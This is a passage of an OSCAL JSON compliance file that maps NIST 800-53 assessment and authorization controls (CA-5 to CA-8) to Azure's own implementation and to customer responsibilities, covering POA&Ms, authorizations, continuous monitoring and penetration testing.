Refer to control PS-03 for more details around background screening process."}],"responsibilities":[{"uuid":"3a0f1311-c6bc-4c77-94fa-297162481ae8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-018"}],"description":"The customer is responsible for verifying individuals or systems transferring data between interconnecting systems have the requisite authorizations prior to accepting such data on customer-deployed resources.","provided-uuid":"54569efd-946e-4a3d-962a-5f16e40e8b04"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d19929ba-bae9-438c-96be-2a7a3c514635","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-5","statements":[{"uuid":"83958371-1fa0-4b84-b781-1ccf1fd54ee4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-019"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-5_smt.a","by-components":[{"uuid":"59c26bca-9bda-4415-97ad-b239b9d3c877","export":{"provided":[{"uuid":"359080e7-7f75-4b24-8251-cdebfe0b0395","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-019"}],"description":"Azure develops plans of action and milestones (POA&Ms) in accordance with Office of Management and Budget guidance and certification requirements. POA&Ms are developed and maintained by Azure. 
The POA&M report is also updated monthly when vulnerability scans are run and any new vulnerabilities are identified, annually during security assessments, and as needed as a part of continuous monitoring activities. The POA&M is submitted as part of the Azure Security Authorization Package provided to the authorizing officials."}],"responsibilities":[{"uuid":"74a2181c-7fa7-4448-999b-46271be41241","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-019"}],"description":"The customer is responsible for developing a plan of action and milestones (POA&M) for customer-deployed resources. The POA&M should include planned remedial actions to correct deficiencies noted during the security assessment (see CA-02) and to reduce/eliminate known vulnerabilities in the system. Additionally, any vulnerabilities found as a result of regular vulnerability scanning (see RA-05) must be included in POA&M reporting.","provided-uuid":"359080e7-7f75-4b24-8251-cdebfe0b0395"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"32d76925-3942-4919-bb0e-27de2461e726","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-020"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-5_smt.b","by-components":[{"uuid":"9f84058d-ae47-43d0-8ff8-5610d21f62ae","export":{"provided":[{"uuid":"eebdd03a-23d3-4886-9d9d-09a16c6a58c3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-020"}],"description":"Azure updates the POA&M report on at least a monthly basis based on the findings 
of the security control assessments and ongoing continuous monitoring activities, including vulnerability scanning. Microsoft includes an action step to remediate any items from ongoing assessments and vulnerability scans (if any) consistent with the vulnerability management process in the monthly POA&M submission. Microsoft provides a high-level description of the issue and the remediation plan. The raw scan reports contain details on any issues noted and are made available to the authorizing officials monthly."}],"responsibilities":[{"uuid":"f336ef76-cb87-4f10-9922-6239e67dba53","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-020"}],"description":"The customer is responsible for updating POA&M items defined in CA-05.a, which should include findings from security assessments, impact analyses, and continuous monitoring activities.","provided-uuid":"eebdd03a-23d3-4886-9d9d-09a16c6a58c3"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"4ee63a29-59e5-45e0-ac04-08d6e2ea6ddc","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-6","statements":[{"uuid":"9b1ae086-cc37-465a-8ed9-d7c6c0f6c86b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-6_smt.a","by-components":[{"uuid":"0d25e3e3-6dc3-4935-83de-28c2ea259ee6","export":{"provided":[{"uuid":"557eb405-1d4c-4bd4-bbe5-28849d31c575","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-021"}],"description":"Assessment and authorization activities follow established Federal processes as documented in NIST Special Publication 800-37 Revision 2, Guide for Applying the Risk Management Framework to Federal Information Systems. As part of the Security Authorization process, the authorizing officials review the Azure Security Authorization package to understand the level of risk posed by vulnerabilities identified in the information system and determine whether to grant a provisional ATO. The explicit acceptance of the risk to customer agency operations, assets, and individuals is the responsibility of customer organizations. The customer must consider many factors, balancing security considerations with mission and operational needs. The customer issues an authorization decision for the information system after reviewing the authorization package submitted by the Azure System Owner. 
The authorization package provides the FedRAMP JAB, DISA/DoD authorizing officials, other regulators, and customers with the essential information needed to make a credible risk-based decision on whether to grant a P-ATO for the offerings and services that comprise Azure."}],"responsibilities":[{"uuid":"d225f2c2-6dee-4e9d-b46b-29ebb013ea2a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-021"}],"description":"The customer is responsible for assigning a senior authorizing official (AO) for customer-deployed resources.","provided-uuid":"557eb405-1d4c-4bd4-bbe5-28849d31c575"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"7a5999b1-2a52-481c-aa8b-80cf5d796cbf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-022"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-6_smt.b","by-components":[{"uuid":"00a970ac-33e0-4220-8f8b-6542147cb9d1","export":{"provided":[{"uuid":"547056d1-6c78-4316-b7e3-1bfbcad0b256","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-022"}],"description":"Assessment and authorization activities follow established Federal processes as documented in NIST Special Publication 800-37 Revision 2, Guide for Applying the Risk Management Framework to Federal Information Systems. The Microsoft system does not inherit security controls from other systems. 
As part of the Security Authorization process, the authorizing officials review the Azure Security Authorization package for common controls available for inheritance to understand the level of risk posed by vulnerabilities identified in the information system and determine whether to grant a provisional ATO. The explicit acceptance of the risk to customer agency operations, assets, and individuals is the responsibility of customer organizations. The customer must consider many factors, balancing security considerations with mission and operational needs. The customer issues an authorization decision for the information system after reviewing the authorization package submitted by the Azure System Owner. The authorization package provides the FedRAMP JAB, DISA/DoD authorizing officials, other regulators, and customers with the essential information needed to make a credible risk-based decision on whether to grant a P-ATO for the offerings and services that comprise Azure."}],"responsibilities":[{"uuid":"a4d8c457-1aae-4671-b7b3-257237f7b2ca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-022"}],"description":"The customer is responsible for assigning a senior official as the authorizing official for common controls available for inheritance for customer-deployed resources.","provided-uuid":"547056d1-6c78-4316-b7e3-1bfbcad0b256"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"009227d6-aaa2-43e5-971a-f45b3ddca10d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-023"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-6_smt.c","by-components":[{"uuid":"26cc649f-380d-4aff-af93-10017d04ce34","export":{"provided":[{"uuid":"b27c3636-6493-4596-b6a6-f509b60ef542","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-023"}],"description":"The FedRAMP JAB, DISA/DoD authorizing officials, and other regulators determine if the remaining known vulnerabilities in the information system pose an acceptable level of risk to issue a P-ATO. Agencies must also determine whether the risk to agency operations, assets, and individuals is acceptable. Following review of the security authorization package and consultation with key agency officials, the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators render an authorization decision to: * Authorize system operation without any restrictions or limitations on its operation; * Authorize system operation with restriction or limitation on its operation. The POA&M must include detailed corrective actions to correct deficiencies. 
Resubmit an updated accreditation package upon completion of required POA&M actions to move to authorization to operate without any restrictions; or * Not authorize the system for operation."}],"responsibilities":[{"uuid":"c12b7f86-78b5-4a2a-9df0-deda2827d4c9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-023"}],"description":"The customer is responsible for ensuring customer-deployed resources are authorized before operations commence.","provided-uuid":"b27c3636-6493-4596-b6a6-f509b60ef542"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c1d8094b-6148-434b-a90e-81b54e4edc42","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-024"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-6_smt.d","by-components":[{"uuid":"dc30a07c-0372-4aa0-ac12-ad70b76551a9","export":{"provided":[{"uuid":"e76c468d-9895-4f38-b19a-d5c5c1e6c9d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-024"}],"description":"The Microsoft system does not inherit security controls from other systems. The FedRAMP JAB, DISA/DoD authorizing officials, and other regulators determine if the remaining known vulnerabilities in the information system pose an acceptable level of risk to issue a P-ATO. Agencies must also determine whether the risk to agency operations, assets, and individuals is acceptable. 
Following review of the security authorization package and consultation with key agency officials, the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators render an authorization decision to: * Authorize system operation without any restrictions or limitations on its operation; * Authorize system operation with restriction or limitation on its operation. The POA&M must include detailed corrective actions to correct deficiencies. Resubmit an updated accreditation package upon completion of required POA&M actions to move to authorization to operate without any restrictions; or * Not authorize the system for operation."}],"responsibilities":[{"uuid":"e0864521-8868-4796-a16f-cd1d498e2d6d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-024"}],"description":"The customer is responsible for ensuring the authorizing official for common controls authorizes the use of those controls for inheritance by organizational systems.","provided-uuid":"e76c468d-9895-4f38-b19a-d5c5c1e6c9d9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"02af1af2-a503-4927-a750-632e30eb0fb6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-025"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-6_smt.e","by-components":[{"uuid":"72ea3fa4-2bfc-49c7-add1-acc8e3defe71","export":{"provided":[{"uuid":"a697b674-1863-4acf-ab5c-50b2d838d639","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-025"}],"description":"The FedRAMP JAB, DISA/DoD authorizing officials, and other regulators update the security authorization as 
needed based on submissions by Microsoft driven by the regular reauthorization schedule every three years or when there is a significant change as defined in NIST Special Publication 800-37 Revision 2, Appendix F."}],"responsibilities":[{"uuid":"b1e943fc-8c03-4dd0-bb8c-abd4011c3683","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-025"}],"description":"The customer is responsible for updating the security authorization for customer-deployed resources.","provided-uuid":"a697b674-1863-4acf-ab5c-50b2d838d639"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"91bdac4f-748f-4488-87ad-1c5ba0de5db6","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-7","statements":[{"uuid":"771484b0-39d3-4a1d-a304-af9eb6a9a6a9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-026"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-7_smt.a","by-components":[{"uuid":"be8824d8-9963-4100-bfeb-420bbf9f0a7a","export":{"provided":[{"uuid":"75a1500c-0903-4ac8-b692-ee4d97f4a3a3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-026"}],"description":"As part of the configuration management process, Microsoft performs a Security Impact Analysis (SIA) and Business Impact Analysis (BIA) for all significant changes. 
Deficiencies in the system are documented in the SSP and SAR that are included in the Security Authorization Package. As part of continuous monitoring, Azure documents such as the SSP, SAR, and POA&M are updated to reflect any newly identified or remediated security issues. Additionally, Microsoft tracks to closure all vulnerabilities identified through the vulnerability scanning processes described in RA-05. In addition, cloud services tagged as within the Azure compliance and security boundary are required to complete compliance onboarding requirements designed to ensure the use of common Azure processes and tooling for addressing security risks."}],"responsibilities":[{"uuid":"1d5d21e1-fe0f-4df8-b823-4305b2bbe047","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-026"}],"description":"The customer is responsible for developing a continuous monitoring strategy and implementing a continuous monitoring program for customer-deployed resources.","provided-uuid":"75a1500c-0903-4ac8-b692-ee4d97f4a3a3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"e399ac29-0c12-40bc-b3e5-0f710ee98382","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-027"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-7_smt.b","by-components":[{"uuid":"9a5649a7-a988-4b85-9309-f4c47ed80e05","export":{"provided":[{"uuid":"632725c7-4583-436a-9361-aeca81ecd077","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-027"}],"description":"Microsoft tracks the rate of closure of POA&M 
and vulnerability items continuously and reviews this data at least monthly."}],"responsibilities":[{"uuid":"f65243ed-fc13-4d04-96b3-476600146bcb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-027"}],"description":"The customer is responsible for continuously monitoring customer-deployed resources and performing supporting assessments of that monitoring activity.","provided-uuid":"632725c7-4583-436a-9361-aeca81ecd077"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"426b4d42-be78-44d1-9e79-de1674782163","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-028"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-7_smt.c","by-components":[{"uuid":"623be9c3-08af-4084-89d9-89d9ab920888","export":{"provided":[{"uuid":"72686fb4-7333-458f-ae9c-fc00ae1e9311","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-028"}],"description":"Microsoft has designated a security assessment program to evaluate the ongoing effectiveness of security controls outlined in the Azure SSP. The Security Assessment Program includes the assessment of all controls identified as necessary. 
Additionally, recommended technical testing is performed to meet the continuous monitoring requirements identified."}],"responsibilities":[{"uuid":"2d65e74d-a4c9-4657-b617-c2200d7f0bd2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-028"}],"description":"The customer is responsible for ongoing security assessments in accordance with the customer's continuous monitoring strategy.","provided-uuid":"72686fb4-7333-458f-ae9c-fc00ae1e9311"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ccd7aca1-7c6b-40bd-abca-2a56ddd34fdd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-029"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-7_smt.d","by-components":[{"uuid":"6684d027-1945-4e92-8ae9-84e2dc759dac","export":{"provided":[{"uuid":"9531f54d-0011-4aa1-90f6-ab4ac1a5ebc1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-029"}],"description":"Any new deficiencies that are identified from the security control assessments are documented in the POA&M. The POA&M is continuously updated and used to report on the security state of the information system as part of monthly reviews. 
POA&M updates are provided to customers monthly, consistent with requirements."}],"responsibilities":[{"uuid":"3a496ca9-5f31-4743-aa93-59dcf3668b6e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-029"}],"description":"The customer is responsible for ongoing security status monitoring of the metrics defined in CA-07 Part a.","provided-uuid":"9531f54d-0011-4aa1-90f6-ab4ac1a5ebc1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"8b851a3d-08c1-446d-be9f-92a7c95207ef","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-030"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-7_smt.e","by-components":[{"uuid":"cfc93d89-d2d0-465b-bc8c-bc0eac02683f","export":{"provided":[{"uuid":"c81b9ab5-d28a-4ae5-9282-fce524d93242","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-030"}],"description":"The Azure Continuous Monitoring team performs correlation and analysis of security-related information generated by assessments and monitoring, including vulnerability scan results, POA&M updates, and recurring control testing. Each vulnerability is assessed and classified as actionable (i.e., requiring remediation), risk reduced, false positive, or risk accepted. Microsoft mitigates all discovered high-risk vulnerabilities within thirty (30) days, all moderate-risk vulnerabilities within ninety (90) days, and all low-risk vulnerabilities within one hundred and eighty (180) days. 
The results are summarized into the Continuous Monitoring Reports and are input into the POA&M for tracking if applicable."}],"responsibilities":[{"uuid":"be3726a8-e54b-446b-a87d-dcd2348887c7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-030"}],"description":"The customer is responsible for correlating and analyzing security-related information generated by assessments and monitoring of customer-deployed resources.","provided-uuid":"c81b9ab5-d28a-4ae5-9282-fce524d93242"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1c637107-2d14-4f03-b072-a6ce0e1ee474","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-031"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-7_smt.f","by-components":[{"uuid":"4d952a9f-4076-4516-b861-a3adfc55cbae","export":{"provided":[{"uuid":"d33b4cbe-cdb3-486b-aa60-834d805a9c71","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-031"}],"description":"The Azure Continuous Monitoring team tracks open POA&Ms and vulnerabilities and coordinates with the service teams to drive these issues to closure."}],"responsibilities":[{"uuid":"8e7e153d-ca3d-4649-8b42-2a8cabf36d48","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-031"}],"description":"The customer is responsible for responding to the results of the analysis defined in CA-07 Part e.","provided-uuid":"d33b4cbe-cdb3-486b-aa60-834d805a9c71"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d4bd9526-708b-41a9-903f-e850d034c28d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-032"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-7_smt.g","by-components":[{"uuid":"f085ee58-a134-43a1-8d26-80605e0c937c","export":{"provided":[{"uuid":"a1e4b19b-2d7a-439a-a871-fa1dbde3de53","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-032"}],"description":"Any new deficiencies that are identified from the security control assessments are documented in the POA&M. The POA&M is continuously updated and used to report on the security state of the information system as part of monthly reviews. 
POA&M updates are reviewed and validated by the Third Party Assessment Organization (3PAO), and are provided to customers and the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators monthly, consistent with requirements."}],"responsibilities":[{"uuid":"0ce385b4-4b1e-4dd6-8e0c-9cd3a5f606b8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-032"}],"description":"The customer is responsible for reporting the security status of customer-deployed resources","provided-uuid":"a1e4b19b-2d7a-439a-a871-fa1dbde3de53"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"de4c3bb8-392d-45ac-a931-05bdf243c344","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-7.1","statements":[{"uuid":"6cfe9620-cd62-4b74-8850-abdbcefb2c90","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-033"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-7.1_smt","by-components":[{"uuid":"e6e24afb-a983-4452-bd74-0c270422899a","export":{"provided":[{"uuid":"f9ccacd5-2d1a-4a83-8b86-21283d1a4626","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-033"}],"description":"Azure employs an independent assessment team to monitor security controls during monthly continuous monitoring activities and annually during the annual assessment. 
Azure utilizes an approved 3PAO to perform this monitoring, as well as to assess significant changes such as the addition of datacenters to the authorization boundary."}],"responsibilities":[{"uuid":"d5b0002b-7996-438c-ae43-6b55b6e40199","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-033"}],"description":"The customer is responsible for employing independent assessors or assessment teams to monitor security controls for customer-deployed resources on an ongoing basis.","provided-uuid":"f9ccacd5-2d1a-4a83-8b86-21283d1a4626"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b49e151c-2047-46d4-9138-b8e3f0b2b95d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-7.4","statements":[{"uuid":"1cb972d0-6e99-4c13-9132-1ba41f030c66","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-7.4_smt","by-components":[{"uuid":"2fcf3a1d-ee1a-4baa-8401-5a394c2a45a8","export":{"provided":[{"uuid":"b71532f9-4b4b-435b-baf0-fdcce9848a20","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-034"}],"description":"Azure has designated a security assessment program to evaluate the ongoing effectiveness of security controls outlined in the Azure SSP as part of the organization-defined continuous monitoring strategy. 
The Security Assessment Program includes the assessment of all controls identified in the High baseline of NIST SP 800-53 Revision 5, Security and Privacy Controls for Information Systems and Organizations. A risk category is allocated to each security control; controls deemed core are tested annually by independent auditors, and the results are subsequently reviewed by the FedRAMP Joint Authorization Board (JAB). Non-core controls are tested once every three years, as determined by JAB guidance. All controls are tested by independent auditors for effectiveness. Controls deemed not effective are assigned Plan of Action & Milestones (POA&M) items. Azure has a mature continuous monitoring program designed to track all identified POA&Ms. Risk categorization is applied to all POA&Ms, and an analysis is performed to ensure that appropriate mitigating factors and remediation steps are in place to address the risk each POA&M represents. On a monthly cadence, POA&M reports are delivered to stakeholders of the security assessment program, including the independent auditors and the JAB. The Azure continuous monitoring program follows the requirements set by the JAB. The annual security assessment and continuous monitoring programs also incorporate compliance and change monitoring, whereby security controls are tested on an annual basis and identified POA&Ms are tracked continuously, with monthly reporting to program stakeholders. 
Refer to CA-02 and CA-07 controls for more details on the programs."}],"responsibilities":[{"uuid":"b7071e4b-ab94-4292-a46d-28ea2bda634e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-034"}],"description":"The customer is responsible for ensuring risk monitoring is an integral part of the continuous monitoring strategy which includes effectiveness, compliance, and change monitoring for customer-deployed resources.","provided-uuid":"b71532f9-4b4b-435b-baf0-fdcce9848a20"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b905a025-3a57-4148-98a8-6173fa16fb51","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-8","statements":[{"uuid":"8382e980-d6f4-45ed-82e1-f29967812554","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-035"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-8_smt","by-components":[{"uuid":"6cc4f6e4-0c15-4695-babb-a915dd1fe15f","export":{"provided":[{"uuid":"49f839e4-e89e-4769-a07d-dee3a343edad","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-035"}],"description":"An independent penetration testing team within Microsoft's security organization conducts annual unannounced penetration testing (tests may be coordinated with Azure management personnel in order to mitigate risk to the availability of Azure; Azure management personnel do not notify operational/technical personnel 
